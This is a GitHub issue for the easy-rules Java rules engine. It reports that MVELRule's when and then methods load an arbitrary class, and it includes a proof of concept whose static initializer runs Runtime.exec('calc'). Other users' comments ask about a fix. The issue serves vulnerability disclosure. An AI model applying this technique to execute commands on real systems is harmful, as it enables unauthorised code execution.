search

j-easy / easy-rules

The simple, stupid rules engine for Java
https://github.com/j-easy/easy-rules/wiki
MIT License
4.83k stars 1.04k forks source link

MVELRule Remote Code Execution #419

Open sirnple opened 7 months ago

sirnple commented 7 months ago

easy-rules-mvel version: 4.1.0

I have run code like: 

try {
    MVELRule mVELRule = new MVELRule();
    MVELRule result = mVELRule.then("jaz.Zer");
} catch (Exception e) {
}

Meanwhile I hava class jaz.Zer in classpath, which content is:

import java.io.IOException;

public class Zer {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}

On Windows platform, above code will open my PC's calculator

Additional: MVELRule.when also leads to this RCE

try {
    MVELRule mVELRule = new MVELRule();
    MVELRule result = mVELRule.when("\bjaz.Zer");
} catch (Exception e) {
}
dvgaba commented 5 months ago

It's a limitation of mvel expression language.

LuisMedinaG commented 4 months ago

Hi! Do you have an update on this, is there a workaround or fix for this? I see the vulnerability is still open.

dmuley17 commented 3 months ago

Do we have any workaround to fix the vulnerability ?